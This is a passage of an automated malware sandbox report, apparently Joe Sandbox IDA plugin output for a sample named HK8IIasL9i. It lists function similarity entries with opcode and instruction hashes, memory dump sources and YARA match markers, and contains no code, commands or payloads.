                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                        • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: {}
                                                                                                                                                                                                                                                        • API String ID: 0-4269290415
                                                                                                                                                                                                                                                        • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                        • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                        • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                        • Instruction ID: 0de6db653e9b938d7b9584f2bb83849907292f7b0c6d1cbe7e897a508e79900e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD1E5726083599FD714CE24C4907AFBBD6AFC4311F19862DEC9987281D7B9DD08C792
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: /,-
                                                                                                                                                                                                                                                        • API String ID: 2994545307-1700940157
                                                                                                                                                                                                                                                        • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                        • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /,-
                                                                                                                                                                                                                                                        • API String ID: 0-1700940157
                                                                                                                                                                                                                                                        • Opcode ID: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                        • Instruction ID: e9d4973df15d0a9ffc1ece4cf7faae488d9480d7705ee11e666af3efad342ec2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd61eaabca8c3d4106ab26b04688d9f0e7a3b9e8178b00c10dfc939fc062fcac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CB16A707083409BD7548F24C885A7BB7B2EB96314F188A2CED9B57291DB39DC05CBA7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: VtA
                                                                                                                                                                                                                                                        • API String ID: 2994545307-3724035812
                                                                                                                                                                                                                                                        • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                        • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                        • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 9YB
                                                                                                                                                                                                                                                        • API String ID: 0-659603884
                                                                                                                                                                                                                                                        • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                        • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                        • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                        • Instruction ID: 9e3c635e1c1f5c78e1b2d06ef11bc6740acd0385d937c2ccdf5bf3d617ebf5f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0912D71E043518BE751CE29C88029AB7E5AB81350F588A69F8D5D7393EB3CDD458BC3
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction ID: 6611777e2a6ec737545e50a6f622be5064478a673fc50d27cabe9e5aaad848c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B912637759A900BC31C9E7C4C622A7BA834BD7330B2DC77DA9B2CB3E5D66988054395
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction ID: 9df34bdc8ce9582b6f2791f746cfc2ce65e2bf2f0c0dc3bf3b1492552d7448f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AB149711083859FD321CF58C98061BFBE0AFA9304F548A2DF5D997742D635EA18CBA7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                        • API String ID: 0-1553575800
                                                                                                                                                                                                                                                        • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                        • Instruction ID: c496766fb7d766c5dd5b82cbbd67feda79c32e25a75e7fe7b40cc722f4eac909
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19715872A182518BD328CF28CC95BABBBDAEBD1304F19C53DD481DB295DB789906C781
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction ID: efe94809d0a92202c2dc3e29383afe2778aad01ab7e550755d53c844252c5369
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E071C432A083558BD724CE28C48037EB7E2ABC5711F29856DEC949B392D7B9DD4D8742
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: klm
                                                                                                                                                                                                                                                        • API String ID: 0-3800403225
                                                                                                                                                                                                                                                        • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                        • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: klm
                                                                                                                                                                                                                                                        • API String ID: 0-3800403225
                                                                                                                                                                                                                                                        • Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                        • Instruction ID: 43ad6f126ededea34ee4b9820373df96626fe4670e998c6dc4dd8f4e550fbb63
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB51E3B460D3518BD724DF24C45276BB7F2FFA6308F18995CE4D58B290E7398901CB1A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: pF
                                                                                                                                                                                                                                                        • API String ID: 0-4112324664
                                                                                                                                                                                                                                                        • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                        • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: ?^A
                                                                                                                                                                                                                                                        • API String ID: 2994545307-4120214115
                                                                                                                                                                                                                                                        • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                        • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 6B
                                                                                                                                                                                                                                                        • API String ID: 0-4127139157
                                                                                                                                                                                                                                                        • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                                                                                                                                                                        • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $%
                                                                                                                                                                                                                                                        • API String ID: 0-4214564638
